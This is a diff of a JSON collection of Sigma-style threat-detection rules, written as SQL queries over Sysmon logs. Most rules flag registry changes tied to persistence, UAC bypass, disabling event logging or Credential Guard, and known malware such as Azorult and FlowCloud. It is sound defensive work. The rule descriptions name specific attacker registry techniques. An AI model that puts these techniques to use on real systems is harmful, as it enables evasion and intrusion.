"author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "status": "test", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_taskcache_entry.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", - "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", "status": "test", - "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", - "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ "attack.persistence", - "attack.execution", - "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_cve_2020_1048_new_printer_port.yml" - }, - { - "title": "Persistence Via Hhctrl.ocx", - "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", - "status": "experimental", - "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" - ], - "filename": "registry_set_hhctrl_persistence.yml" + "filename": "registry_event_mal_flowcloud.yml" }, { - "title": "Execution DLL of Choice Using WAB.EXE", - "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", "status": "test", - "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_wab_dllpath_reg_change.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Add Debugger Entry To Hangs Key For Persistence", - "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ - "This value is not set by default but could be rarly used by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_hangs_debugger_persistence.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "New DNS ServerLevelPluginDll Installed", - "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", + "title": "Potential Ransomware Activity Using LegalNotice Message", + "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "status": "experimental", - "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" ], - "filename": "registry_set_dns_server_level_plugin_dll.yml" + "filename": "registry_set_legalnotice_susp_message.yml" }, { - "title": "Hiding User Account Via SpecialAccounts Registry Key", - "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "title": "Windows Credential Editor Registry", + "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", "status": "test", - "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.002" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" ], - "filename": "registry_set_special_accounts.yml" + "filename": "registry_event_hack_wce_reg.yml" }, { - "title": "Disable Windows Defender Functionalities Via Registry Keys", - "id": "0eb46774-f1ab-4a74-8238-1155855f2263", - "status": "experimental", - "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", - "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", + "title": "Security Support Provider (SSP) Added to LSA Configuration", + "id": 